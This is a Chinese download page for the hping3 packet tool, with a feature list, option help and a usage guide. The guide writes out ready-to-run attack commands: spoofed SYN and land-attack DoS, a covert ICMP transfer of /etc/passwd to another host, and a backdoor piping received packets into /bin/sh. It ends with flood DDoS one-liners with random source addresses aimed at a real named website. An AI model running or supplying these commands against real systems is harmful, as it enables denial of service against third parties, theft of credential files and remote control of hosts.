hping3
v20051105 安裝版- 軟件大小:570.00 KB
- 軟件語言:中文
- 軟件類型:國產軟件 / 系統(tǒng)設置
- 軟件授權: 免費軟件
- 更新時間:2021-08-09 15:41:18
- 軟件等級:
- 軟件廠商: -
- 應用平臺:WinAll
- 軟件官網(wǎng): 暫無
相關軟件
Win10 20H2系統(tǒng)屬性切換工具v2021.4.8.1658 綠色版
43.00 KB/中文/10.0
豆沙綠護眼配色器v1.21 綠色版
471.00 KB/中文/10.0
RegScanner(注冊表檢索)v2.70 漢化綠色免費版
175.00 KB/多國語言[中文]/10.0
360win10設置提取版v1.0.0.1 綠色版
55.00 KB/中文/0.0
360右鍵管理工具v1.0.0.0 獨立版
48.00 KB/中文/0.0
軟件介紹人氣軟件精品推薦相關文章網(wǎng)友評論下載地址
hping3是一款可以用于幫助用戶使用計算機命令行來生成和解析TCP/IP協(xié)議數(shù)據(jù)包匯編/分析的免費開源工具,支持多種協(xié)議,在各個系統(tǒng)上都可以較為穩(wěn)定的運行,幫助用戶快速的測試網(wǎng)絡安全等等一系列的功能
軟件功能
- 防火墻測試
- 高級端口掃描
- 網(wǎng)絡測試,使用不同的協(xié)議,TOS,分片
- 手動路徑MTU發(fā)現(xiàn)
- 在所有支持的協(xié)議下,高級traceroute
- 遠程操作系統(tǒng)指紋
- 遠程正常運行時間猜測
- TCP/IP協(xié)議棧審計
- hping也可以用于學習TCP/IP的學生
用法介紹
用法: hping3 host [options]
-h --help 顯示幫助
-v --version 顯示版本
-c --count 發(fā)送數(shù)據(jù)包的數(shù)目
-i --interval 發(fā)送數(shù)據(jù)包間隔的時間 (uX即X微秒, 例如: -i u1000)
--fast 等同 -i u10000 (每秒10個包)
--faster 等同 -i u1000 (每秒100個包)
--flood 盡最快發(fā)送數(shù)據(jù)包,不顯示回復。
-n --numeric 數(shù)字化輸出,象征性輸出主機地址。
-q --quiet 安靜模式
-I --interface 網(wǎng)卡接口 (默認路由接口)
-V --verbose 詳細模式
-D --debug 調試信息
-z --bind 綁定ctrl+z到ttl(默認為目的端口)
-Z --unbind 取消綁定ctrl+z鍵
--beep 對于接收到的每個匹配數(shù)據(jù)包蜂鳴聲提示
模式亮點
模式選擇
default mode TCP // 默認模式是 TCP
-0 --rawip RAWIP模式,原始IP模式。在此模式下HPING會發(fā)送帶數(shù)據(jù)的IP頭。即裸IP方式。使用RAWSOCKET方式。
-1 --icmp ICMP模式,此模式下HPING會發(fā)送IGMP應答報,你可以用--ICMPTYPE --ICMPCODE選項發(fā)送其他類型/模式的ICMP報文。
-2 --udp UDP 模式,缺省下,HPING會發(fā)送UDP報文到主機的0端口,你可以用--baseport --destport --keep選項指定其模式。
-8 --scan SCAN mode. //掃描模式 指定掃描對應的端口。
Example: hping --scan 1-30,70-90 -S www.target.host // 掃描
-9 --listen listen mode // 監(jiān)聽模式
IP 模式
-a --spoof spoof source address //源地址欺騙。偽造IP攻擊,防火墻就不會記錄你的真實IP了,當然回應的包你也接收不到了。
--rand-dest random destionation address mode. see the man. // 隨機目的地址模式。詳細使用 man 命令
--rand-source random source address mode. see the man. // 隨機源地址模式。詳細使用 man 命令
功能介紹
防火墻測試
使用Hping3指定各種數(shù)據(jù)包字段,依次對防火墻進行詳細測試。請參考:http://0daysecurity.com/articles/hping3_examples.html
測試防火墻對ICMP包的反應、是否支持traceroute、是否開放某個端口、對防火墻進行拒絕服務攻擊(DoS attack)。例如,以LandAttack方式測試目標防火墻(Land Attack是將發(fā)送源地址設置為與目標地址相同,誘使目標機與自己不停地建立連接)。
hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10
端口掃描
Hping3也可以對目標端口進行掃描。Hping3支持指定TCP各個標志位、長度等信息。以下示例可用于探測目標機的80端口是否開放:
hping3 -I eth0 -S 192.168.10.1 -p 80
其中-I eth0指定使用eth0端口,-S指定TCP包的標志位SYN,-p 80指定探測的目的端口。
hping3支持非常豐富的端口探測方式,nmap擁有的掃描方式hping3幾乎都支持(除開connect方式,因為Hping3僅發(fā)送與接收包,不會維護連接,所以不支持connect方式探測)。而且Hping3能夠對發(fā)送的探測進行更加精細的控制,方便用戶微調探測結果。當然,Hping3的端口掃描性能及綜合處理能力,無法與Nmap相比。一般使用它僅對少量主機的少量端口進行掃描。
Idle掃描
Idle掃描(Idle Scanning)是一種匿名掃描遠程主機的方式,該方式也是有Hping3的作者Salvatore Sanfilippo發(fā)明的,目前Idle掃描在Nmap中也有實現(xiàn)。
該掃描原理是:尋找一臺idle主機(該主機沒有任何的網(wǎng)絡流量,并且IPID是逐個增長的),攻擊端主機先向idle主機發(fā)送探測包,從回復包中獲取其IPID。冒充idle主機的IP地址向遠程主機的端口發(fā)送SYN包(此處假設為SYN包),此時如果遠程主機的目的端口開放,那么會回復SYN/ACK,此時idle主機收到SYN/ACK后回復RST包。然后攻擊端主機再向idle主機發(fā)送探測包,獲取其IPID。那么對比兩次的IPID值,我們就可以判斷遠程主機是否回復了數(shù)據(jù)包,從而間接地推測其端口狀態(tài)。
拒絕服務攻擊
使用Hping3可以很方便構建拒絕服務攻擊。比如對目標機發(fā)起大量SYN連接,偽造源地址為192.168.10.99,并使用1000微秒的間隔發(fā)送各個SYN包。
hping3 -I eth0 -a 192.168.10.99 -S 192.168.10.33 -p 80 -i u1000
其他攻擊如smurf、teardrop、land attack等也很容易構建出來。
文件傳輸
Hping3支持通過TCP/UDP/ICMP等包來進行文件傳輸。相當于借助TCP/UDP/ICMP包建立隱秘隧道通訊。實現(xiàn)方式是開啟監(jiān)聽端口,對檢測到的簽名(簽名為用戶指定的字符串)的內容進行相應的解析。在接收端開啟服務:
hping3 192.168.1.159 --listen signature --safe --icmp
監(jiān)聽ICMP包中的簽名,根據(jù)簽名解析出文件內容。
在發(fā)送端使用簽名打包的ICMP包發(fā)送文件:
hping3 192.168.1.108--icmp -d 100 --sign signature --file /etc/passwd
將/etc/passwd密碼文件通過ICMP包傳給192.168.10.44主機。發(fā)送包大小為100字節(jié)(-d 100),發(fā)送簽名為signature(-sign signature)。
木馬功能
如果Hping3能夠在遠程主機上啟動,那么可以作為木馬程序啟動監(jiān)聽端口,并在建立連接后打開shell通信。與netcat的后門功能類似。
示例:本地打開53號UDP端口(DNS解析服務)監(jiān)聽來自192.168.10.66主機的包含簽名為signature的數(shù)據(jù)包,并將收到的數(shù)據(jù)調用/bin/sh執(zhí)行。
在木馬啟動端:
hping3 192.168.10.66 --listen signature --safe --udp -p 53 | /bin/sh
在遠程控制端:
echo ls >test.cmd
hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd
將包含ls命令的文件加上簽名signature發(fā)送到192.168.10.44主機的53號UDP端口,包數(shù)據(jù)長度為100字節(jié)。
當然這里只是簡單的演示程序,真實的場景,控制端可以利益shell執(zhí)行很多的高級復雜的操作。
hping主要是進行DDOS攻擊的
1、UDP ddos攻擊:
hping3 -c 10000 -d 120 --udp -w 64 -p 80 --flood --rand-source www.baidu.com
2、ICMP? ddos攻擊:
hping3 -c 10000 -d 120 --icmp -w 64 -p 80 --flood --rand-source www.baidu.com
3、SYN ddos攻擊:
hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source www.baidu.com
4、ACK ddos攻擊:
hping3 -c 10000 -d 120 -A -w 64 -p 80 --flood --rand-source www.baidu.com
更多>> 軟件截圖
推薦應用
configtool大華配置管理軟件 31.36 MB
下載/中文/6.0 v5.001.0000001 官方中文版RegScanner(注冊表檢索) 175.00 KB
下載/多國語言[中文]/10.0 v2.70 漢化綠色免費版windows7 OEM設置工具 6.80 MB
下載/中文/10.0 綠色版gamma panel(電腦屏幕亮度調節(jié)器) 184.00 KB
下載/中文/10.0 v1.0.0.20 漢化版Coopen播放器(開屏桌面畫報) 869.00 KB
下載/中文/10.0 v5.0.0.110 正式版聯(lián)想冰封系統(tǒng)破解版通用版(無加密) 230.00 KB
下載/中文/10.0屏幕亮度調節(jié)軟件(電腦屏幕調節(jié)工具) 2.25 MB
下載/中文/10.0 v1.02 免費版
其他版本下載
精品推薦
相關文章
下載地址
hping3 v20051105 安裝版
查看所有評論>> 網(wǎng)友評論
更多>> 猜你喜歡